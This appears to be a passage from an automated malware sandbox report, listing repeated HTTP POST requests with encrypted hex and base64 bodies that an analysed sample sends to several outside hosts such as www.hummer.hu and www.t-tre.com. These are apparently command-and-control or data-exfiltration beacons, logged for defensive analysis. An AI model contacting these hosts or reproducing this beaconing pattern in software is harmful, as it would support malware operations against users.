4b 38 69 78 7a 6c 5a 4d 32 48 57 53 39 56 38 57 52 74 73 55 52 57 4a 32 48 44 4e 42 59 59 41 48 33 59 4a 63 67 44 44 39 41 4e 4f 46 57 59 71 49 6f 44 58 5a 63 32 46 6b 64 31 52 6d 30 74 79 2f 72 42 66 41 73 62 2b 2f 59 32 55 53 44 68 42 77 73 78 72 47 68 33 34 71 75 30 57 2f 77 64 52 4e 42 4f 65 43 64 6f 42 45 68 79 64 65 34 73 49 48 36 71 33 6e 51 79 49 33 57 48 36 6b 32 39 67 5a 77 33 71 4e 76 6a 65 51 49 44 31 67 2f 2b 55 6b 77 6d 70 4f Data Ascii: TeZA3SaAR89tQhfPwZnVw0lo4UEGYULGupYRf3JFM2oxl28eUE25DnUCQ+cMsxIXqIa82y/L7ItIWhhtjCHAXuD8Ks6rgsojUGyhTAfOJt/a2+ybQ7Qv81cVJ+r3+/sHsKGw+xi/PVZKMoud/lpEX89zycBrnyYyfw3CIi9XqzdBfaj4capr1rVKYZyCl3tR6RioZra6ubn/WQg51YDyLHVZA7umYYI/hWV4Xf5UTIA6qWK0hlwCtOdOIzRgyC5GzURzE+XFQtAyQReumIspkpgFAYnzbeG3/NXGT3iWa6BB6NS5uKtj/N7DuPa4rT5sWBJ+d5OTL6PLS0+8wuYOxmjnkRmoLSp5GG3T2p7SsbCn+B7Js9N77+mUeJ3McrK24ldYC9Hjtk1LNbuFgI3rK8ixzlZM2HWS9V8WRtsURWJ2HDNBYYAH3YJcgDD9ANOFWYqIoDXZc2Fkd1Rm0ty/rBfAsb+/Y2USDhBwsxrGh34qu0W/wdRNBOeCdoBEhyde4sIH6q3nQyI3WH6k29gZw3qNvjeQID1g/+UkwmpO
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 4e 53 49 47 33 39 79 4f 52 38 38 37 53 5a 59 79 42 39 78 34 4f 57 2b 4b 42 4e 6e 30 33 4d 4e 69 30 47 56 6c 35 6a 64 58 66 57 35 45 79 48 46 41 62 4b 6c 4e 70 63 79 67 44 57 71 76 32 69 32 30 30 39 32 54 77 58 51 48 4b 32 33 54 79 38 34 57 65 79 49 6f 65 75 4a 65 6b 6c 42 30 39 4e 56 2f 47 43 56 4f 66 6b 67 74 37 51 70 7a 45 78 79 58 75 4d 4e 2b 65 6f 42 47 33 53 43 66 6a 2b 42 31 48 43 78 6e 61 34 33 46 77 33 71 4e 43 44 74 6a 7a 73 69 59 35 53 63 30 70 79 73 6c 54 75 5a 61 52 67 6a 53 69 67 63 42 75 6e 4e 6f 65 48 61 53 74 36 65 52 57 4e 35 39 34 52 37 31 4e 38 43 5a 39 6e 44 79 59 41 76 38 4e 65 52 66 30 65 70 37 41 4a 53 76 61 39 75 71 57 58 46 72 47 52 48 35 57 49 4d 57 32 2b 75 44 73 4f 47 41 76 6a 6b 49 5a 78 67 48 65 48 36 46 4b 31 32 78 51 71 64 67 35 2f 31 61 35 33 48 73 61 70 50 36 74 43 44 68 66 68 72 62 47 36 41 31 6a 2b 4e 6f 65 6e 35 38 7a 74 50 42 74 6d 61 74 74 46 56 63 49 6b 48 62 33 6b 6c 2b 62 76 6a 71 51 66 6f 61 38 41 57 45 4f 67 52 6a 78 73 42 30 58 66 48 6e 56 57 41 35 39 4a 38 69 66 6a 44 68 6d 2b 35 33 45 34 4d 45 61 63 4c 2b 69 35 53 78 70 7a 46 61 55 44 7a 30 79 63 37 50 32 43 4b 69 32 49 61 38 38 55 62 6c 2f 58 56 4a 76 2f 63 6f 68 66 44 2f 66 70 4f 6e 32 4b 4f 63 4f 4a 74 4b 46 75 61 56 63 46 77 4f 30 57 46 6f 4b 58 51 73 75 2f 38 63 58 6d 5a 49 75 33 71 5a 2b 38 37 67 53 37 4f 52 31 4b 4e 45 78 41 77 35 58 6e 6b 58 42 75 75 70 75 47 5a 47 75 5a 73 61 62 37 76 67 75 56 73 48 48 41 4b 76 68 58 4c 65 56 7a 72 6a 6a 63 37 6e 4c 2b 51 79 78 6d 65 69 56 7a 4d 77 4d 6f 33 51 6b 6d 6b 41 37 76 63 6f 41 41 4c 63 73 4d 39 79 59 69 54 38 61 38 39 58 6e 36 71 2b 7a 4e 5a 41 4f 6d 72 42 6d 61 70 54 39 32 32 32 4d 53 79 47 72 39 76 6d 71 53 70 33 71 48 6b 35 50 59 49 66 74 6a 35 4c 59 46 6c 49 73 77 3d 3d Data Ascii: NSIG39yOR887SZYyB9x4OW+KBNn03MNi0GVl5jdXfW5EyHFAbKlNpcygDWqv2i20092TwXQHK23Ty84WeyIoeuJeklB09NV/GCVOfkgt7QpzExyXuMN+eoBG3SCfj+B1HCxna43Fw3qNCDtjzsiY5Sc0pyslTuZaRgjSigcBunNoeHaSt6eRWN594R71N8CZ9nDyYAv8NeRf0ep7AJSva9uqWXFrGRH5WIMW2+uDsOGAvjkIZxgHeH6FK12xQqdg5/1a53HsapP6tCDhfhrbG6A1j+Noen58ztPBtmattFVcIkHb3kl+bvjqQfoa8AWEOgRjxsB0XfHnVWA59J8ifjDhm+53E4MEacL+i5SxpzFaUDz0yc7P2CKi2Ia88Ubl/XVJv/cohfD/fpOn2KOcOJtKFuaVcFwO0WFoKXQsu/8cXmZIu3qZ+87gS7OR1KNExAw5XnkXBuupuGZGuZsab7vguVsHHAKvhXLeVzrjjc7nL+QyxmeiVzMwMo3QkmkA7vcoAALcsM9yYiT8a89Xn6q+zNZAOmrBmapT9222MSyGr9vmqSp3qHk5PYIftj5LYFlIsw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 30 33 66 71 33 76 61 4e 52 38 38 6a 45 47 30 33 55 53 79 6e 49 70 6c 4b 59 66 77 57 57 79 54 6e 69 68 48 66 59 6b 6d 64 48 4b 65 58 51 39 66 34 63 39 35 71 5a 33 73 46 65 63 41 76 71 2f 45 69 50 68 74 48 61 74 48 50 35 4a 57 79 4d 70 78 42 48 34 38 57 38 30 74 75 56 41 4b 66 53 4f 70 35 67 4e 6e 66 48 4e 4a 33 4c 6f 5a 34 6f 38 4e 31 78 4f 52 61 69 76 64 62 42 6d 68 4d 44 65 67 52 76 2b 2f 30 78 54 6d 73 72 55 38 78 42 52 42 57 6e 5a 47 35 71 33 71 4a 31 52 6b 72 48 74 45 70 39 64 32 74 4f 51 78 2b 6f 47 4c 72 72 54 54 6b 33 65 67 5a 67 4c 55 37 66 33 6d 4c 76 46 39 4a 2f 33 4c 2b 67 42 6c 30 34 58 2b 37 6a 30 35 75 47 51 49 41 53 42 31 65 35 51 73 4c 35 48 55 2f 34 75 41 45 58 33 70 54 32 4a 5a 59 31 2f 44 63 6b 36 51 53 32 36 77 36 79 6a 78 78 6a 70 6a 6c 42 72 61 53 35 34 53 48 78 36 54 32 5a 55 2b 35 47 32 68 52 64 70 4a 76 61 6c 33 58 79 4a 49 31 67 67 53 55 4f 39 6e 61 67 34 51 68 7a 39 72 33 30 45 61 46 6f 79 47 4b 55 63 76 48 6a 7a 69 67 37 65 79 4a 33 47 50 75 61 57 6a 75 2f 63 73 34 65 76 70 6a 35 54 58 68 65 79 35 66 32 75 49 65 64 4f 6b 79 72 36 4a 4a 71 31 77 58 4c 6b 54 6e 53 65 78 73 36 4d 78 6b 4a 6a 34 49 43 6f 6b 70 41 71 66 78 37 7a 46 36 6e 79 4a 6a 66 6b 72 45 35 56 47 72 6f 57 65 35 77 69 30 5a 43 67 38 76 67 64 49 5a 51 61 39 73 46 2b 34 55 65 42 30 71 55 77 54 42 36 6a 43 53 50 46 5a 7a 35 42 50 6c 69 62 74 57 49 74 49 48 75 66 5a 38 45 48 68 76 75 2f 36 57 41 66 4f 62 58 2f 4d 66 34 72 57 59 68 6c 43 70 43 62 75 37 35 62 55 4c 33 32 4f 43 69 35 57 48 34 45 77 57 74 4b 66 42 75 47 70 51 39 2f 55 4b 37 4b 50 33 6d 67 4d 62 35 34 39 34 65 32 4b 43 4c 71 45 44 5a 55 70 67 70 35 50 43 76 44 4f 2f Data Ascii: 03fq3vaNR88jEG03USynIplKYfwWWyTnihHfYkmdHKeXQ9f4c95qZ3sFecAvq/EiPhtHatHP5JWyMpxBH48W80tuVAKfSOp5gNnfHNJ3LoZ4o8N1xORaivdbBmhMDegRv+/0xTmsrU8xBRBWnZG5q3qJ1RkrHtEp9d2tOQx+oGLrrTTk3egZgLU7f3mLvF9J/3L+gBl04X+7j05uGQIASB1e5QsL5HU/4uAEX3pT2JZY1/Dck6QS26w6yjxxjpjlBraS54SHx6T2ZU+5G2hRdpJval3XyJI1ggSUO9nag4Qhz9r30EaFoyGKUcvHjzig7eyJ3GPuaWju/cs4evpj5TXhey5f2uIedOkyr6JJq1wXLkTnSexs6MxkJj4ICokpAqfx7zF6nyJjfkrE5VGroWe5wi0ZCg8vgdIZQa9sF+4UeB0qUwTB6jCSPFZz5BPlibtWItIHufZ8EHhvu/6WAfObX/Mf4rWYhlCpCbu75bUL32OCi5WH4EwWtKfBuGpQ9/UK7KP3mgMb5494e2KCLqEDZUpgp5PCvDO/
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 54 65 5a 41 33 53 61 41 52 38 39 74 51 68 66 50 77 5a 6e 56 77 30 6c 6f 34 55 45 47 59 55 4c 47 75 70 59 52 66 33 4a 46 4d 32 6f 78 6c 32 38 65 55 45 32 35 44 6e 55 43 51 2b 63 4d 73 78 49 58 71 49 61 38 32 79 2f 4c 37 49 74 49 57 68 68 74 6a 43 48 41 58 75 44 38 4b 73 36 72 67 73 6f 6a 55 47 79 68 54 41 66 4f 4a 74 2f 61 32 2b 79 62 51 37 51 76 38 31 63 56 4a 2b 72 33 2b 2f 73 48 73 4b 47 77 2b 78 69 2f 50 56 5a 4b 4d 6f 75 64 2f 6c 70 45 58 38 39 7a 79 63 42 72 6e 79 59 79 66 77 33 43 49 69 39 58 71 7a 64 42 66 61 6a 34 63 61 70 72 31 72 56 4b 59 5a 79 43 6c 33 74 52 36 52 69 6f 5a 72 61 36 75 62 6e 2f 57 51 67 35 31 59 44 79 4c 48 56 5a 41 37 75 6d 59 59 49 2f 68 57 56 34 58 66 35 55 54 49 41 36 71 57 4b 30 68 6c 77 43 74 4f 64 4f 49 7a 52 67 79 43 35 47 7a 55 52 7a 45 2b 58 46 51 74 41 79 51 52 65 75 6d 49 73 70 6b 70 67 46 41 59 6e 7a 62 65 47 33 2f 4e 58 47 54 33 69 57 61 36 42 42 36 4e 53 35 75 4b 74 6a 2f 4e 37 44 75 50 61 34 72 54 35 73 57 42 4a 2b 64 35 4f 54 4c 36 50 4c 53 30 2b 38 77 75 59 4f 78 6d 6a 6e 6b 52 6d 6f 4c 53 70 35 47 47 33 54 32 70 37 53 73 62 43 6e 2b 42 37 4a 73 39 4e 37 37 2b 6d 55 65 4a 33 4d 63 72 4b 32 34 6c 64 59 43 39 48 6a 74 6b 31 4c 4e 62 75 46 67 49 33 72 4b 38 69 78 7a 6c 5a 4d 32 48 57 53 39 56 38 57 52 74 73 55 52 57 4a 32 48 44 4e 42 59 59 41 48 33 59 4a 63 67 44 44 39 41 4e 4f 46 57 59 71 49 6f 44 58 5a 63 32 46 6b 64 31 52 6d 30 74 79 2f 72 42 66 41 73 62 2b 2f 59 32 55 53 44 68 42 77 73 78 72 47 68 33 34 71 75 30 57 2f 77 64 52 4e 42 4f 65 43 64 6f 42 45 68 79 64 65 34 73 49 48 36 71 33 6e 51 79 49 33 57 48 36 6b 32 39 67 5a 77 33 71 4e 76 6a 65 51 49 44 31 67 2f 2b 55 6b 77 6d 70 4f Data Ascii: TeZA3SaAR89tQhfPwZnVw0lo4UEGYULGupYRf3JFM2oxl28eUE25DnUCQ+cMsxIXqIa82y/L7ItIWhhtjCHAXuD8Ks6rgsojUGyhTAfOJt/a2+ybQ7Qv81cVJ+r3+/sHsKGw+xi/PVZKMoud/lpEX89zycBrnyYyfw3CIi9XqzdBfaj4capr1rVKYZyCl3tR6RioZra6ubn/WQg51YDyLHVZA7umYYI/hWV4Xf5UTIA6qWK0hlwCtOdOIzRgyC5GzURzE+XFQtAyQReumIspkpgFAYnzbeG3/NXGT3iWa6BB6NS5uKtj/N7DuPa4rT5sWBJ+d5OTL6PLS0+8wuYOxmjnkRmoLSp5GG3T2p7SsbCn+B7Js9N77+mUeJ3McrK24ldYC9Hjtk1LNbuFgI3rK8ixzlZM2HWS9V8WRtsURWJ2HDNBYYAH3YJcgDD9ANOFWYqIoDXZc2Fkd1Rm0ty/rBfAsb+/Y2USDhBwsxrGh34qu0W/wdRNBOeCdoBEhyde4sIH6q3nQyI3WH6k29gZw3qNvjeQID1g/+UkwmpO
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 4e 53 49 47 33 39 79 4f 52 38 38 37 53 5a 59 79 42 39 78 34 4f 57 2b 4b 42 4e 6e 30 33 4d 4e 69 30 47 56 6c 35 6a 64 58 66 57 35 45 79 48 46 41 62 4b 6c 4e 70 63 79 67 44 57 71 76 32 69 32 30 30 39 32 54 77 58 51 48 4b 32 33 54 79 38 34 57 65 79 49 6f 65 75 4a 65 6b 6c 42 30 39 4e 56 2f 47 43 56 4f 66 6b 67 74 37 51 70 7a 45 78 79 58 75 4d 4e 2b 65 6f 42 47 33 53 43 66 6a 2b 42 31 48 43 78 6e 61 34 33 46 77 33 71 4e 43 44 74 6a 7a 73 69 59 35 53 63 30 70 79 73 6c 54 75 5a 61 52 67 6a 53 69 67 63 42 75 6e 4e 6f 65 48 61 53 74 36 65 52 57 4e 35 39 34 52 37 31 4e 38 43 5a 39 6e 44 79 59 41 76 38 4e 65 52 66 30 65 70 37 41 4a 53 76 61 39 75 71 57 58 46 72 47 52 48 35 57 49 4d 57 32 2b 75 44 73 4f 47 41 76 6a 6b 49 5a 78 67 48 65 48 36 46 4b 31 32 78 51 71 64 67 35 2f 31 61 35 33 48 73 61 70 50 36 74 43 44 68 66 68 72 62 47 36 41 31 6a 2b 4e 6f 65 6e 35 38 7a 74 50 42 74 6d 61 74 74 46 56 63 49 6b 48 62 33 6b 6c 2b 62 76 6a 71 51 66 6f 61 38 41 57 45 4f 67 52 6a 78 73 42 30 58 66 48 6e 56 57 41 35 39 4a 38 69 66 6a 44 68 6d 2b 35 33 45 34 4d 45 61 63 4c 2b 69 35 53 78 70 7a 46 61 55 44 7a 30 79 63 37 50 32 43 4b 69 32 49 61 38 38 55 62 6c 2f 58 56 4a 76 2f 63 6f 68 66 44 2f 66 70 4f 6e 32 4b 4f 63 4f 4a 74 4b 46 75 61 56 63 46 77 4f 30 57 46 6f 4b 58 51 73 75 2f 38 63 58 6d 5a 49 75 33 71 5a 2b 38 37 67 53 37 4f 52 31 4b 4e 45 78 41 77 35 58 6e 6b 58 42 75 75 70 75 47 5a 47 75 5a 73 61 62 37 76 67 75 56 73 48 48 41 4b 76 68 58 4c 65 56 7a 72 6a 6a 63 37 6e 4c 2b 51 79 78 6d 65 69 56 7a 4d 77 4d 6f 33 51 6b 6d 6b 41 37 76 63 6f 41 41 4c 63 73 4d 39 79 59 69 54 38 61 38 39 58 6e 36 71 2b 7a 4e 5a 41 4f 6d 72 42 6d 61 70 54 39 32 32 32 4d 53 79 47 72 39 76 6d 71 53 70 33 71 48 6b 35 50 59 49 66 74 6a 35 4c 59 46 6c 49 73 77 3d 3d Data Ascii: NSIG39yOR887SZYyB9x4OW+KBNn03MNi0GVl5jdXfW5EyHFAbKlNpcygDWqv2i20092TwXQHK23Ty84WeyIoeuJeklB09NV/GCVOfkgt7QpzExyXuMN+eoBG3SCfj+B1HCxna43Fw3qNCDtjzsiY5Sc0pyslTuZaRgjSigcBunNoeHaSt6eRWN594R71N8CZ9nDyYAv8NeRf0ep7AJSva9uqWXFrGRH5WIMW2+uDsOGAvjkIZxgHeH6FK12xQqdg5/1a53HsapP6tCDhfhrbG6A1j+Noen58ztPBtmattFVcIkHb3kl+bvjqQfoa8AWEOgRjxsB0XfHnVWA59J8ifjDhm+53E4MEacL+i5SxpzFaUDz0yc7P2CKi2Ia88Ubl/XVJv/cohfD/fpOn2KOcOJtKFuaVcFwO0WFoKXQsu/8cXmZIu3qZ+87gS7OR1KNExAw5XnkXBuupuGZGuZsab7vguVsHHAKvhXLeVzrjjc7nL+QyxmeiVzMwMo3QkmkA7vcoAALcsM9yYiT8a89Xn6q+zNZAOmrBmapT9222MSyGr9vmqSp3qHk5PYIftj5LYFlIsw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 67 72 34 59 4a 53 4b 46 51 63 38 6e 49 68 63 42 6c 55 49 67 33 71 56 47 32 64 4b 79 72 39 51 32 64 73 31 4a 54 57 6b 71 70 41 77 37 53 52 33 6f 56 50 7a 79 76 6b 32 67 6c 43 44 72 43 6a 39 2b 36 58 4b 54 43 42 32 48 4c 77 6d 35 38 54 46 42 43 4f 37 49 77 37 44 79 77 33 6b 63 30 2f 44 35 6b 47 30 63 65 4f 42 2f 4c 79 68 6f 53 73 44 4d 63 77 71 45 72 58 47 66 49 50 4c 45 75 63 47 45 63 72 69 61 7a 45 42 42 6d 33 2f 4b 62 6a 79 54 50 64 31 78 33 4a 61 6d 44 64 79 73 72 79 59 4f 6b 72 57 36 4f 46 69 4a 32 71 54 76 53 42 67 68 5a 52 41 43 6c 6c 4d 63 38 73 47 42 37 47 72 45 76 71 58 42 4d 62 38 4b 6b 39 4c 6a 6f 68 4b 61 50 77 51 79 33 49 6a 68 6f 66 58 64 75 5a 31 56 52 6b 50 58 71 6a 67 70 79 6e 72 78 32 58 79 4c 55 74 6f 78 34 4b 6f 45 5a 42 51 31 6e 34 6c 6a 38 52 76 49 4d 72 75 30 44 39 2f 61 70 78 31 78 36 37 35 56 5a 5a 30 6f 33 79 67 4e 55 47 6b 4e 67 65 49 45 63 69 39 68 76 69 45 4a 50 74 57 4d 45 34 68 77 4a 61 56 77 4b 4f 69 67 44 6e 55 65 37 68 4d 42 50 34 41 57 76 39 47 72 50 31 34 50 55 37 72 6e 62 6d 36 33 44 6e 6c 4b 35 68 68 70 4f 57 49 6f 46 2b 61 53 42 4d 35 6e 66 52 62 55 61 71 50 66 6a 51 43 61 53 68 53 75 62 61 32 41 6d 59 69 44 70 36 73 71 4e 5a 46 32 6b 43 31 53 30 4e 61 30 6c 52 34 71 6a 70 57 46 68 58 4e 76 55 31 51 46 61 4e 51 77 67 66 68 72 4c 33 69 4e 34 47 45 51 42 38 69 49 35 63 32 65 47 37 41 73 36 36 54 70 69 5a 37 62 55 4d 48 6a 78 36 66 56 4e 38 74 68 74 70 61 74 33 76 62 68 4e 32 45 49 43 56 74 6d 57 6c 37 4e 79 67 71 73 75 75 4b 46 35 49 36 76 30 33 4d 43 2f 35 4c 42 6e 75 49 4d 50 55 67 55 75 52 70 62 6b 48 69 48 47 64 38 38 45 4e 6a 52 46 79 2b 71 4e 36 44 73 Data Ascii: gr4YJSKFQc8nIhcBlUIg3qVG2dKyr9Q2ds1JTWkqpAw7SR3oVPzyvk2glCDrCj9+6XKTCB2HLwm58TFBCO7Iw7Dyw3kc0/D5kG0ceOB/LyhoSsDMcwqErXGfIPLEucGEcriazEBBm3/KbjyTPd1x3JamDdysryYOkrW6OFiJ2qTvSBghZRACllMc8sGB7GrEvqXBMb8Kk9LjohKaPwQy3IjhofXduZ1VRkPXqjgpynrx2XyLUtox4KoEZBQ1n4lj8RvIMru0D9/apx1x675VZZ0o3ygNUGkNgeIEci9hviEJPtWME4hwJaVwKOigDnUe7hMBP4AWv9GrP14PU7rnbm63DnlK5hhpOWIoF+aSBM5nfRbUaqPfjQCaShSuba2AmYiDp6sqNZF2kC1S0Na0lR4qjpWFhXNvU1QFaNQwgfhrL3iN4GEQB8iI5c2eG7As66TpiZ7bUMHjx6fVN8thtpat3vbhN2EICVtmWl7NygqsuuKF5I6v03MC/5LBnuIMPUgUuRpbkHiHGd88ENjRFy+qN6Ds
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 77 62 76 76 4b 38 4e 74 4f 63 38 71 77 6e 78 6a 79 6a 67 67 58 4f 79 77 55 7a 39 70 48 78 35 47 70 39 65 32 6d 4d 58 58 4f 32 61 30 50 62 52 4c 76 74 59 63 54 34 4c 59 2b 58 54 79 38 72 72 68 45 65 33 68 46 53 6c 6b 45 6d 42 4c 2f 34 63 45 67 4f 34 36 44 44 34 75 65 71 63 5a 45 4b 72 54 74 56 6d 2b 33 36 6b 70 51 78 4c 2f 69 70 30 37 49 41 45 46 62 67 48 6c 4c 42 4c 46 43 6e 6a 35 4e 31 75 62 41 51 43 4a 68 4c 73 44 36 2b 47 6e 4e 50 49 55 68 36 31 59 47 6b 78 36 56 49 33 51 71 7a 74 2b 6b 65 70 46 48 4e 70 76 50 39 5a 6b 6f 38 62 51 6f 66 4f 4d 72 35 41 4a 77 69 75 76 79 74 37 69 79 44 6a 58 4e 47 73 77 46 76 4f 77 69 53 4b 75 68 50 78 5a 64 69 38 35 73 70 33 2f 63 6a 4c 6f 65 76 36 38 45 79 6b 63 45 38 35 47 69 48 78 73 50 4a 70 4f 70 31 37 2f 55 57 6c 2b 4a 69 37 45 34 31 6c 39 67 30 77 65 6a 72 48 6e 69 6c 54 4e 31 77 4e 43 7a 4c 39 76 50 46 31 51 52 63 6b 6d 66 43 58 48 39 64 6a 63 74 39 35 70 49 6c 55 71 74 4a 77 6c 42 70 6a 59 69 49 62 52 6e 44 6d 41 6d 39 57 4c 47 78 47 48 4d 37 71 38 30 6b 5a 4c 6c 36 2b 69 55 74 69 6c 68 47 32 31 53 38 6c 30 62 30 71 7a 54 4b 6a 70 64 5a 58 41 56 62 44 38 54 62 4d 50 48 59 63 6e 4f 4a 79 45 2f 58 6d 33 71 33 62 66 63 7a 39 42 76 58 71 32 71 57 7a 38 39 47 63 59 6a 31 45 56 66 39 71 6e 78 31 35 4e 39 30 78 67 72 63 49 70 47 50 42 53 4b 62 56 32 44 43 35 30 41 44 4b 41 2b 75 38 54 4a 7a 6b 69 55 4b 79 4e 38 32 72 36 2f 52 54 4e 72 66 55 53 49 65 35 32 4e 46 4d 52 31 64 64 6d 70 4c 65 6a 4a 65 78 4a 36 70 72 4e 46 44 34 4e 74 66 38 36 4e 75 44 57 5a 34 48 50 75 52 69 6d 68 71 34 6e 44 74 4f 49 31 49 77 66 38 46 33 6d 54 44 6e 2f 58 57 44 64 79 41 3d 3d Data Ascii: wbvvK8NtOc8qwnxjyjggXOywUz9pHx5Gp9e2mMXXO2a0PbRLvtYcT4LY+XTy8rrhEe3hFSlkEmBL/4cEgO46DD4ueqcZEKrTtVm+36kpQxL/ip07IAEFbgHlLBLFCnj5N1ubAQCJhLsD6+GnNPIUh61YGkx6VI3Qqzt+kepFHNpvP9Zko8bQofOMr5AJwiuvyt7iyDjXNGswFvOwiSKuhPxZdi85sp3/cjLoev68EykcE85GiHxsPJpOp17/UWl+Ji7E41l9g0wejrHnilTN1wNCzL9vPF1QRckmfCXH9djct95pIlUqtJwlBpjYiIbRnDmAm9WLGxGHM7q80kZLl6+iUtilhG21S8l0b0qzTKjpdZXAVbD8TbMPHYcnOJyE/Xm3q3bfcz9BvXq2qWz89GcYj1EVf9qnx15N90xgrcIpGPBSKbV2DC50ADKA+u8TJzkiUKyN82r6/RTNrfUSIe52NFMR1ddmpLejJexJ6prNFD4Ntf86NuDWZ4HPuRimhq4nDtOI1Iwf8F3mTDn/XWDdyA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.t-tre.comCache-Control: no-cacheData Raw: 30 33 66 71 33 76 61 4e 52 38 38 6a 45 47 30 33 55 53 79 6e 49 70 6c 4b 59 66 77 57 57 79 54 6e 69 68 48 66 59 6b 6d 64 48 4b 65 58 51 39 66 34 63 39 35 71 5a 33 73 46 65 63 41 76 71 2f 45 69 50 68 74 48 61 74 48 50 35 4a 57 79 4d 70 78 42 48 34 38 57 38 30 74 75 56 41 4b 66 53 4f 70 35 67 4e 6e 66 48 4e 4a 33 4c 6f 5a 34 6f 38 4e 31 78 4f 52 61 69 76 64 62 42 6d 68 4d 44 65 67 52 76 2b 2f 30 78 54 6d 73 72 55 38 78 42 52 42 57 6e 5a 47 35 71 33 71 4a 31 52 6b 72 48 74 45 70 39 64 32 74 4f 51 78 2b 6f 47 4c 72 72 54 54 6b 33 65 67 5a 67 4c 55 37 66 33 6d 4c 76 46 39 4a 2f 33 4c 2b 67 42 6c 30 34 58 2b 37 6a 30 35 75 47 51 49 41 53 42 31 65 35 51 73 4c 35 48 55 2f 34 75 41 45 58 33 70 54 32 4a 5a 59 31 2f 44 63 6b 36 51 53 32 36 77 36 79 6a 78 78 6a 70 6a 6c 42 72 61 53 35 34 53 48 78 36 54 32 5a 55 2b 35 47 32 68 52 64 70 4a 76 61 6c 33 58 79 4a 49 31 67 67 53 55 4f 39 6e 61 67 34 51 68 7a 39 72 33 30 45 61 46 6f 79 47 4b 55 63 76 48 6a 7a 69 67 37 65 79 4a 33 47 50 75 61 57 6a 75 2f 63 73 34 65 76 70 6a 35 54 58 68 65 79 35 66 32 75 49 65 64 4f 6b 79 72 36 4a 4a 71 31 77 58 4c 6b 54 6e 53 65 78 73 36 4d 78 6b 4a 6a 34 49 43 6f 6b 70 41 71 66 78 37 7a 46 36 6e 79 4a 6a 66 6b 72 45 35 56 47 72 6f 57 65 35 77 69 30 5a 43 67 38 76 67 64 49 5a 51 61 39 73 46 2b 34 55 65 42 30 71 55 77 54 42 36 6a 43 53 50 46 5a 7a 35 42 50 6c 69 62 74 57 49 74 49 48 75 66 5a 38 45 48 68 76 75 2f 36 57 41 66 4f 62 58 2f 4d 66 34 72 57 59 68 6c 43 70 43 62 75 37 35 62 55 4c 33 32 4f 43 69 35 57 48 34 45 77 57 74 4b 66 42 75 47 70 51 39 2f 55 4b 37 4b 50 33 6d 67 4d 62 35 34 39 34 65 32 4b 43 4c 71 45 44 5a 55 70 67 70 35 50 43 76 44 4f 2f Data Ascii: 03fq3vaNR88jEG03USynIplKYfwWWyTnihHfYkmdHKeXQ9f4c95qZ3sFecAvq/EiPhtHatHP5JWyMpxBH48W80tuVAKfSOp5gNnfHNJ3LoZ4o8N1xORaivdbBmhMDegRv+/0xTmsrU8xBRBWnZG5q3qJ1RkrHtEp9d2tOQx+oGLrrTTk3egZgLU7f3mLvF9J/3L+gBl04X+7j05uGQIASB1e5QsL5HU/4uAEX3pT2JZY1/Dck6QS26w6yjxxjpjlBraS54SHx6T2ZU+5G2hRdpJval3XyJI1ggSUO9nag4Qhz9r30EaFoyGKUcvHjzig7eyJ3GPuaWju/cs4evpj5TXhey5f2uIedOkyr6JJq1wXLkTnSexs6MxkJj4ICokpAqfx7zF6nyJjfkrE5VGroWe5wi0ZCg8vgdIZQa9sF+4UeB0qUwTB6jCSPFZz5BPlibtWItIHufZ8EHhvu/6WAfObX/Mf4rWYhlCpCbu75bUL32OCi5WH4EwWtKfBuGpQ9/UK7KP3mgMb5494e2KCLqEDZUpgp5PCvDO/
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 6f 52 48 72 38 47 50 54 50 38 39 64 52 4c 50 7a 36 69 47 52 31 59 78 4c 45 69 75 4a 74 57 2f 6b 52 38 65 70 43 69 67 73 76 4f 4c 53 7a 6a 79 79 67 5a 69 4a 75 31 35 31 44 51 58 62 32 4b 59 54 45 36 55 46 62 7a 5a 79 4a 38 71 53 64 73 43 42 79 64 52 71 65 73 62 59 33 51 34 77 6a 46 4a 79 73 6c 41 2b 7a 44 48 54 79 2b 33 46 7a 35 54 41 31 78 42 49 54 39 43 46 70 6b 46 79 67 78 73 48 50 41 4f 63 41 72 72 61 58 49 69 53 7a 38 45 73 6f 67 54 4b 33 6c 34 4a 54 4e 56 45 5a 6c 72 64 7a 4e 4d 4e 43 4c 70 69 57 58 64 56 4e 51 4d 41 75 2f 52 7a 36 41 56 6a 6e 75 6d 52 31 77 4f 62 30 45 48 30 39 34 70 6e 57 64 4e 4b 61 5a 6b 6a 33 69 4a 47 49 44 6e 67 4a 70 51 68 4b 69 38 31 38 6d 69 39 6f 65 68 77 2f 2f 6d 35 42 41 68 34 59 31 4a 4f 42 65 6a 66 4e 4b 63 